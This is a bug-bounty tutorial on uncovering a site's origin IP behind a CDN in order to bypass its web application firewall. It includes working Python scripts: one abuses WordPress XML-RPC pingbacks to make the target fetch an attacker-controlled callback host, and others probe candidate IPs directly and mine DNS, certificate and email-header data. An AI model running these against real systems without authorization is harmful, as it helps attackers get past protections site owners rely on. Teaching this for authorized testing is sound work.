How to identify the origin IP

Many targets put a content delivery network (CDN) or another anti-DDoS reverse proxy in front of their web servers. This hides the origin IP, lets the proxy filter malicious (for example injection) payloads before they reach the origin, and improves content delivery speed. When access to the origin is misconfigured, however, we can reach the origin server directly and bypass the web application firewall that sits on the proxy.

In this article, we’ll explore common ways to identify the origin server’s IP to bypass the reverse proxy, including some more advanced methods.

Let’s dive in!

Unlike a forward proxy, which sits in front of clients and relays their outbound traffic, a reverse proxy is an intermediary server that sits in front of the origin server. Its main task is to accept client requests, forward them to the appropriate backend server, and return that server's response to the client (you).

Difference between a forward proxy vs reverse proxy server

Common use cases for a reverse proxy server include:

  • Load balancing: Distributing incoming requests across multiple backend servers so that no single server becomes overwhelmed. If you have three web servers, the reverse proxy spreads the load between them according to its scheduling policy (round-robin, least connections, and so on).

  • SSL termination: Handling the encryption and decryption of HTTPS traffic, which reduces the computational load on backend servers.

  • Caching: Storing frequently requested content so it can be served quickly without hitting the backend servers every time.

  • Security: A Web Application Firewall (WAF) acts as a shield that can filter malicious requests, hide server details (or add security headers), and provide (D)DoS protection.

  • Compression: Reducing bandwidth usage by compressing responses before sending them to clients.

Popular reverse proxy software such as Nginx and the Apache HTTP Server, and cloud services such as Cloudflare and Akamai, handle all of these tasks for developers. As security researchers, we are particularly interested in the security feature, because the Web Application Firewall (WAF) on the proxy is what blocks our payloads.

To prevent direct access, developers must ensure that the origin server only accepts connections that arrive via the reverse proxy. This is usually done with a firewall rule that allows only the CDN's published IP ranges, sometimes combined with mutual TLS between proxy and origin (Cloudflare calls this Authenticated Origin Pulls). With that in place, even if the origin IP is obtained, the origin server refuses any request that was not routed and validated through the reverse proxy.

In practice, the opposite is often the case. Many origin servers do not filter by source IP and return the full website when accessed directly by IP (with the right Host header). This lets us bypass the security validation and filters that exist only on the reverse proxy, since the origin itself usually has none.

We’ve learned so far what reverse proxies are and the importance of identifying the server’s origin IP. Let’s now take a look at common ways you can leak your target’s origin IP.

Server-side request forgery

A server-side request forgery lets us induce the origin server to make an outbound connection to an external resource of our choosing, including a server we control. With logging on our end, the source address of that connection reveals the server's egress IP. One caveat: the address you observe is the one the server uses for outbound traffic. If the origin sits behind a NAT gateway or egress proxy, this can differ from the address its web server listens on, so always confirm a candidate with a direct request.

Interactsh is a free, open-source OAST server by ProjectDiscovery that captures incoming HTTP, DNS and SMTP interactions.

Abusing WordPress XML RPC to find the origin IP

WordPress exposes an XML-RPC endpoint (xmlrpc.php) so developers can automate certain tasks. The method we are interested in is pingback.ping: it takes a source URL and a target URL (a post on the blog), and WordPress fetches the source URL to verify that it links to the target. Although a pingback is usually considered harmless, that fetch is exactly the outbound request we want to induce from the origin server.

A simulation of the WordPress XML RPC proof of concept
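As an added example (not code from the original article), the following Python script builds the pingback.ping call, points its source URL at an OAST callback, and decodes the XML-RPC reply so you know whether the origin actually fetched the callback. The fault-code meanings come from the Pingback 1.0 specification; the callback URL, the target post URL and both sample responses are constructed for the example.

```python
import urllib.request
import xmlrpc.client


def build_pingback(callback_url: str, target_post_url: str) -> bytes:
    """pingback.ping(sourceURI, targetURI). WordPress fetches sourceURI to check
    that it links to targetURI; that fetch is the outbound request we want."""
    return xmlrpc.client.dumps((callback_url, target_post_url),
                               methodname="pingback.ping").encode()


# Fault codes from the Pingback 1.0 specification and what each one tells us
# about whether the server reached our callback.
FAULT_MEANING = {
    16: "source not fetched: server says it could not reach the callback "
        "(still check the OAST log, a DNS lookup may have arrived)",
    17: "source fetched but contains no link to the target: the server DID "
        "reach the callback, look for its IP in the OAST log",
    33: "target is not a pingback-enabled post: pick another post URL",
    48: "pingback already registered: use a fresh callback URL",
    49: "access denied: pingbacks are disabled",
}


def interpret_response(body: bytes) -> str:
    """Turn the raw XML-RPC reply into a one-line verdict."""
    try:
        params, _ = xmlrpc.client.loads(body.decode())
    except xmlrpc.client.Fault as fault:
        meaning = FAULT_MEANING.get(fault.faultCode, "unrecognised fault")
        return f"fault {fault.faultCode}: {meaning} ({fault.faultString})"
    return f"accepted: {params[0]}"


def send_pingback(xmlrpc_url: str, callback_url: str, target_post_url: str,
                  timeout: float = 10.0) -> str:
    """POST the call to the target's xmlrpc.php (network access required)."""
    req = urllib.request.Request(
        xmlrpc_url, data=build_pingback(callback_url, target_post_url),
        headers={"Content-Type": "text/xml"}, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return interpret_response(resp.read())


# Constructed sample replies, shaped like WordPress output, for offline use.
SAMPLE_FAULT_17 = b"""<?xml version="1.0"?>
<methodResponse><fault><value><struct>
<member><name>faultCode</name><value><int>17</int></value></member>
<member><name>faultString</name><value><string>The source URL does not contain a link to the target URL, and so cannot be used as a source.</string></value></member>
</struct></value></fault></methodResponse>"""

SAMPLE_OK = b"""<?xml version="1.0"?>
<methodResponse><params><param><value><string>Pingback from https://abc.oast.fun/x to https://target.example/?p=1 registered. Keep the web talking! :-)</string></value></param></params></methodResponse>"""

if __name__ == "__main__":
    print(build_pingback("https://abc.oast.fun/x", "https://target.example/?p=1").decode())
    print(interpret_response(SAMPLE_FAULT_17))
    print(interpret_response(SAMPLE_OK))
    # Live use (hypothetical URLs):
    # print(send_pingback("https://target.example/xmlrpc.php",
    #                     "https://abc.oast.fun/x", "https://target.example/?p=1"))
```

Fault 17 is the interesting one: WordPress only complains about a missing link after it has downloaded the source, so that reply confirms the outbound request happened and the origin's egress IP is in your Interactsh log.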

Reading tip: Dive deeper into finding and exploiting advanced server-side request forgery vulnerabilities! We’ve also included a list of the most commonly vulnerable application components you should pay attention to on your next target.

Historical DNS records

Historical DNS datasets can also reveal the origin server's IP. If the reverse proxy was introduced after the domain was first recorded by a passive DNS or DNS history service (such as SecurityTrails), or by internet scanners that record the hostnames seen on each IP (such as Shodan and Censys), the older A records for that hostname will still point at the origin server.

Furthermore, you can also apply the same methodology to subdomains or subsidiary assets of your target, as they can often reveal more information than primary domains. Let’s take a look at a comparable way to find more interesting data that could help us in identifying the server’s origin IP.
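As an added example that is not part of the original article, here is a Python script covering both points above: it turns a DNS history export into origin candidates by discarding addresses that belong to the CDN, and it then checks a candidate directly while presenting the real hostname in SNI and the Host header, so a name-based virtual host on the origin still answers. The CDN range list is a pasted snapshot of Cloudflare's published IPv4 ranges and is an assumption (refresh it from https://www.cloudflare.com/ips-v4, and add your target's provider if it is not Cloudflare); the history rows and the hostname www.example.com are constructed.

```python
import ipaddress
import socket
import ssl

# Snapshot of Cloudflare's published IPv4 ranges (assumption: may be out of
# date; refresh from https://www.cloudflare.com/ips-v4 before relying on it).
CDN_RANGES = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]


def is_cdn_ip(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CDN_RANGES)


def origin_candidates(history: list) -> list:
    """history: (first_seen, ip) rows as exported from a DNS history service.
    Returns the non-CDN addresses, oldest first, without duplicates."""
    seen, out = set(), []
    for first_seen, ip in sorted(history):
        if ip in seen or is_cdn_ip(ip):
            continue
        seen.add(ip)
        out.append((first_seen, ip))
    return out


def direct_fetch(ip: str, host: str, path: str = "/", timeout: float = 5.0) -> bytes:
    """Connect to the candidate IP, not the CDN, but send the real hostname in SNI
    and Host. Verification is off on purpose: the origin may present a self-signed
    or mismatched certificate, and we are fingerprinting it, not trusting it."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    request = f"GET {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
    with socket.create_connection((ip, 443), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(request.encode())
            chunks = []
            while True:
                data = tls.recv(4096)
                if not data:
                    break
                chunks.append(data)
    return b"".join(chunks)


def status_code(raw_response: bytes) -> int:
    """Status code from the first line of a raw HTTP/1.x response."""
    return int(raw_response.split(b"\r\n", 1)[0].split()[1])


def looks_exposed(raw_response: bytes, marker: bytes) -> bool:
    """An origin that answers a direct request with the real site (200 plus a
    string we know appears on the proxied site) is not restricted to the CDN."""
    return status_code(raw_response) == 200 and marker in raw_response


# Constructed sample export, not real DNS history data.
SAMPLE_HISTORY = [
    ("2021-03-02", "203.0.113.25"),   # before the CDN was put in front
    ("2022-08-14", "104.16.10.10"),   # Cloudflare
    ("2023-01-09", "172.67.5.5"),     # Cloudflare
    ("2021-03-02", "203.0.113.25"),   # duplicate row
]

if __name__ == "__main__":
    for first_seen, ip in origin_candidates(SAMPLE_HISTORY):
        print(first_seen, ip)
        # Live check of a real candidate (network access required):
        # body = direct_fetch(ip, "www.example.com")
        # print(ip, status_code(body), looks_exposed(body, b"<title>"))
```

A candidate that returns the site's own title to a direct request is an origin that does not filter on the proxy's addresses; a connection timeout, a TLS reset or a 403 usually means the firewall or Authenticated Origin Pulls described earlier is in place.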

Historical SSL certificate records

Similarly to DNS history services, there are services that index certificate transparency (CT) logs. crt.sh is a popular one: it records every publicly logged SSL/TLS certificate, so we can query the certificate history of a domain, including certificates that were issued for the origin host before the CDN was put in front of it.

Let’s take a look at an example:

Using crt.sh to identify the server's origin IP

In this instance, we can see that Cloudflare was recently added (the latest certificates are issued by Cloudflare's CA). That leaves room to explore the certificates issued before the switch, paying particular attention to the "Subject Alternative Name" field, as it sometimes lists an IP address or an internal or hosting-provider hostname (origin., web01., and similar) that still resolves to the origin server. Scanners also record the certificate served on each IP, so searching for the site's name in certificate fields (for example Shodan's ssl.cert.subject.cn filter) can surface an origin that presents the site's certificate directly.
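The following Python script is an added example, not code from the original article. It parses crt.sh's JSON export for a domain, finds the date of the first certificate issued through the CDN's CA (everything before it predates the proxy), and lists the SAN entries worth resolving: IP literals and any hostname other than the public apex and www names. The records below are constructed; the live query URL format is crt.sh's own, and the issuer keyword "cloudflare" is an assumption you would swap for your target's CDN.

```python
import ipaddress
import json


def crtsh_url(domain: str) -> str:
    """crt.sh's JSON export; %25 is a URL-encoded wildcard that covers subdomains."""
    return f"https://crt.sh/?q=%25.{domain}&output=json"


def parse_crtsh(json_text: str) -> list:
    """One record per log entry; name_value holds the SANs, newline-separated."""
    certs = []
    for rec in json.loads(json_text):
        names = sorted({n.strip().lower() for n in rec["name_value"].split("\n") if n.strip()})
        certs.append({"id": rec["id"], "not_before": rec["not_before"],
                      "issuer": rec["issuer_name"], "names": names})
    return sorted(certs, key=lambda c: c["not_before"])


def is_ip_literal(name: str) -> bool:
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False


def cdn_switchover(certs: list, issuer_keyword: str = "cloudflare"):
    """not_before of the first certificate issued through the CDN's CA, i.e. the
    point after which CT history stops telling us anything about the origin."""
    for cert in certs:
        if issuer_keyword in cert["issuer"].lower():
            return cert["not_before"]
    return None


def origin_hints(certs: list, apex: str) -> list:
    """SANs worth resolving or probing: IP literals and any hostname other than
    the public-facing apex/www names (wildcards carry no information)."""
    public = {apex, "www." + apex}
    hints = set()
    for cert in certs:
        for name in cert["names"]:
            if name.startswith("*.") or name in public:
                continue
            hints.add((cert["not_before"], name, "ip" if is_ip_literal(name) else "host"))
    return sorted(hints)


# Constructed records in crt.sh's JSON shape, not real log entries.
SAMPLE_RECORDS = [
    {"id": 4001, "issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "example.com",
     "name_value": "example.com\nwww.example.com\norigin.example.com",
     "not_before": "2021-05-10T00:00:00", "not_after": "2021-08-08T00:00:00"},
    {"id": 4002, "issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "common_name": "example.com",
     "name_value": "example.com\nwww.example.com\n203.0.113.25",
     "not_before": "2022-06-15T00:00:00", "not_after": "2023-06-15T00:00:00"},
    {"id": 4003, "issuer_name": "C=US, O=Cloudflare Inc., CN=Cloudflare Inc ECC CA-3",
     "common_name": "example.com",
     "name_value": "*.example.com\nexample.com",
     "not_before": "2023-02-01T00:00:00", "not_after": "2024-02-01T00:00:00"},
]
SAMPLE_CRTSH = json.dumps(SAMPLE_RECORDS)

if __name__ == "__main__":
    certs = parse_crtsh(SAMPLE_CRTSH)
    print("CDN in front since:", cdn_switchover(certs))
    for not_before, name, kind in origin_hints(certs, "example.com"):
        print(not_before, kind, name)
```

Each hostname hint still has to be resolved (and each IP probed with a direct request) before you can call it the origin; a public CA will happily issue for a staging or mail host that is not the web origin at all.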

Favicon hash via Shodan / Censys

Favicons are the small icons that appear on the web browser’s tab (next to the page title). The same icons can also be used to find similar hosts that are related to our target, including the origin server that’s behind the reverse proxy.

To do so, we need to calculate the hash of the favicon file the way Shodan does: the MurmurHash3 (mmh3) of the base64-encoded file, with the base64 text broken into 76-character lines. Here's a one-liner using cURL, base64 and the mmh3 Python library (pip install mmh3) that calculates the hash of any favicon for use in your Shodan query:

# GNU base64 wraps at 76 columns by default, which is what Shodan's hash expects
curl -s 'https://example.com/favicon.ico' | base64 | python3 -c 'import mmh3,sys;print(mmh3.hash(sys.stdin.buffer.read()))'

On macOS, the bundled base64 does not wrap lines, so pass -b 76 to get the same hash.

Afterward, query Shodan for hosts whose favicon hash matches, using the http.favicon.hash filter (http.favicon.hash:<hash>). This lists every host serving the same icon, which may include your target's origin server. Censys indexes favicons too, under its own favicon hash fields, so check its field reference for the equivalent query:

Finding related assets with Shodan/Censys via the favicon hash

Email headers

Another common way to find the origin IP is by examining email headers. Legacy application components (password resets, contact forms, order confirmations) are often designed to send mail from the origin server itself rather than through a third-party service such as SendGrid or Amazon SES.

With this in mind, we can trigger such a component to send us an email and examine its headers. Each mail server that handles the message prepends a "Received" header, so the bottom-most one records the IP address the message was first sent from. Occasionally other (custom) headers, such as X-Originating-IP, include the sending IP as well. Bear in mind that the sending host may be a dedicated mail server rather than the web server, so treat the address as a candidate to verify.

Example of an email server response that leaks the origin IP

Using a service such as Shodan, Censys or IPinfo, we can check who owns this IP and what it serves, and verify whether it matches the origin server (a direct request with the site's Host header settles it).
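The following Python script is an added example, not code from the original article. It walks the Received headers of a raw message in transit order (last header first, since each MTA prepends its own), pulls the connecting IP from each hop, and returns the public ones plus any X-Originating-IP value as candidates to check. The message is constructed; it uses documentation address space, which is why the internal filter is an explicit RFC 1918 list rather than ipaddress's is_private check (that would also drop 203.0.113.0/24).

```python
import email
import ipaddress
import re

IP_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")
# Explicit RFC 1918 / loopback list instead of ipaddress.is_private, which would
# also drop the documentation ranges (203.0.113.0/24 etc.) used in the sample.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)


def received_hops(raw: bytes) -> list:
    """Each MTA prepends its own Received header, so the last one in the message
    is the first hop. Returns the connecting IP of every hop, sender first."""
    msg = email.message_from_bytes(raw)
    hops = []
    for header in reversed(msg.get_all("Received", [])):
        match = IP_RE.search(header)   # first dotted quad is the 'from' peer
        if not match:
            continue
        try:
            ipaddress.ip_address(match.group(1))
        except ValueError:             # e.g. 999.1.1.1 inside some token
            continue
        hops.append(match.group(1))
    return hops


def sender_ip_candidates(raw: bytes) -> list:
    """Public addresses from the earliest hops, plus any X-Originating-IP value,
    in the order they should be checked against the origin."""
    msg = email.message_from_bytes(raw)
    extra = [v.strip(" []") for v in msg.get_all("X-Originating-IP", [])]
    candidates = []
    for ip in received_hops(raw) + extra:
        try:
            if not is_internal(ip) and ip not in candidates:
                candidates.append(ip)
        except ValueError:
            continue
    return candidates


# Constructed password-reset mail: the web host handed the message straight to
# our mailbox, so its public address appears in the outermost Received header.
SAMPLE_EMAIL = b"""Received: from web01.example.com (web01.example.com [203.0.113.25])
\tby inbox.attacker-mail.test (Postfix) with ESMTPS id 7F3A2C0
\tfor <me@attacker-mail.test>; Tue, 1 Oct 2024 10:00:03 +0000
Received: from localhost (localhost [127.0.0.1])
\tby web01.example.com (Postfix) with ESMTP id 4B1D9F
\tfor <me@attacker-mail.test>; Tue, 1 Oct 2024 10:00:02 +0000
X-Originating-IP: [203.0.113.25]
X-PHP-Originating-Script: 33:wp-mail.php
From: noreply@example.com
To: me@attacker-mail.test
Subject: Password reset

Click the link below to reset your password.
"""

if __name__ == "__main__":
    print("hops:", received_hops(SAMPLE_EMAIL))
    print("candidates:", sender_ip_candidates(SAMPLE_EMAIL))
```

On a real message, save it with full headers ("show original" in most webmail clients) and feed the bytes in; an X-PHP-Originating-Script header such as the constructed one above is a strong hint that the mail left from the web application host rather than a relay.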

Hard-coded IPs and unique strings

On some occasions, you’ll come across unique string values reflected in your target’s server response that can be used with tools like Shodan and Censys to find the origin server. Let’s take a look at a few examples.

Deliberately triggering errors

Injecting special characters or sending requests with unusual payloads may cause exceptions. Depending on the verbosity level, some applications return more information than necessary in the error, including details about the host (such as an internal hostname or the origin IP).

Sometimes, IP or other references to the origin host can also be found in HTML code (usually in the form of comments).

Copyright

With tools like Google, Shodan & Censys, we can search for similar assets based on a unique string, such as the copyright string. In some cases, we will be able to find the origin’s host behind the reverse proxy.

With Google, a simple search for the string will do. You may have to exclude the root domain (with -site:example.com) to narrow down the results.

Google Dorking can help with finding similar assets, including the origin server (if indexed).

Reading tip: Learn how to use Google dorking to find more security vulnerabilities, legacy assets, and forgotten endpoints.

On Shodan or Censys, we’ll have to make use of a special search syntax to narrow down our searches to match strings in an HTTP response:

Shodan:
http.html:"© copyright "
Censys:
services.http.response.body:"© copyright "

Targets may also include other forms of unique IDs and strings in HTTP responses (such as analytics scripts and Google Tag Manager IDs, custom response headers, etc.). You can apply the same method in order to attempt to find the origin server.
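As an added example (not code from the original article) covering this section and the error and HTML-comment hints above, here is a Python script that mines one HTTP response for origin fingerprints: IP literals and hostnames inside HTML comments or error output, Google Tag Manager and Analytics IDs, the copyright line and custom X- response headers. It then turns each fingerprint into the Google, Shodan and Censys queries shown above. The response body, the headers and the hostname web01.internal.example.com are constructed; the header-name exclusion list is an assumption.

```python
import re

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.S)
HOSTNAME = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b", re.I)
GTM_ID = re.compile(r"\bGTM-[A-Z0-9]{4,8}\b")
GA_ID = re.compile(r"\b(?:UA-\d{4,10}-\d{1,4}|G-[A-Z0-9]{6,12})\b")
COPYRIGHT = re.compile(r"(?:©|&copy;|\(c\)|copyright)\s*[^<\n]{3,80}", re.I)
# Standard security headers that every WAF adds and that identify nothing (assumption).
BORING_HEADERS = {"x-frame-options", "x-content-type-options", "x-xss-protection"}


def extract_fingerprints(body: str, headers: dict) -> dict:
    """Collect strings that are unique to this deployment and may also appear
    on the origin when it is reached directly or indexed by a scanner."""
    fp = {"ips": set(), "comment_hosts": set(), "gtm": set(), "ga": set(),
          "copyright": set(), "headers": set()}
    for comment in HTML_COMMENT.findall(body):            # developer leftovers
        fp["ips"].update(IPV4.findall(comment))
        fp["comment_hosts"].update(h for h in HOSTNAME.findall(comment) if not IPV4.fullmatch(h))
    fp["ips"].update(IPV4.findall(body))                  # stack traces, error pages
    fp["gtm"].update(GTM_ID.findall(body))
    fp["ga"].update(GA_ID.findall(body))
    fp["copyright"].update(m.strip() for m in COPYRIGHT.findall(body))
    for name, value in headers.items():
        if name.lower().startswith("x-") and name.lower() not in BORING_HEADERS:
            fp["headers"].add(f"{name}: {value}")
    return fp


def build_queries(fp: dict, domain: str) -> list:
    """(engine, query) pairs; the Google query excludes the proxied site itself."""
    queries = []
    for text in sorted(fp["copyright"]):
        queries.append(("google", f'"{text}" -site:{domain}'))
        queries.append(("shodan", f'http.html:"{text}"'))
        queries.append(("censys", f'services.http.response.body:"{text}"'))
    for tag_id in sorted(fp["gtm"] | fp["ga"]):
        queries.append(("shodan", f'http.html:"{tag_id}"'))
        queries.append(("censys", f'services.http.response.body:"{tag_id}"'))
    return queries


# Constructed response: a deploy comment, a verbose PHP error and a tag manager snippet.
SAMPLE_BODY = """<!DOCTYPE html>
<html><head><title>Acme Widgets</title>
<!-- deployed to web01.internal.example.com (203.0.113.7) -->
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-AB12CD3"></script>
</head><body>
<pre>Warning: mysqli_connect(): (HY000/2002): Connection refused in /var/www/acme/db.php on line 12
DB host: 10.0.5.21</pre>
<footer>© 2024 Acme Widgets Ltd. All rights reserved.</footer>
</body></html>
"""
SAMPLE_HEADERS = {"Server": "nginx", "X-Frame-Options": "DENY", "X-Backend-Server": "web01"}

if __name__ == "__main__":
    fp = extract_fingerprints(SAMPLE_BODY, SAMPLE_HEADERS)
    for key, values in fp.items():
        print(key, sorted(values))
    for engine, query in build_queries(fp, "example.com"):
        print(engine, query)
```

IPs and hostnames found this way are direct leads (resolve the hostname, then probe the address with a request that carries the site's Host header); the tag IDs and copyright line are indirect ones, and a scanner hit on them still needs the same direct probe before you can call it the origin.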

Identifying the server's origin IP lets you bypass restrictions that were set on the reverse proxy, including security validations such as Web Application Firewalls. In some cases, though, it can be tricky to identify. In this article, we went over various ways to surface candidate origin IPs; always confirm a candidate by requesting the site directly from it, because a leaked address may belong to a mail server, an egress gateway or an unrelated host.

So, you’ve just learned how to find the server’s origin IP to bypass WAFs… Right now, it’s time to put your skills to the test! You can start by practising on vulnerable labs and CTFs or… browse through our 70+ public bug bounty programs on Intigriti and who knows, maybe earn a bounty on your next submission!
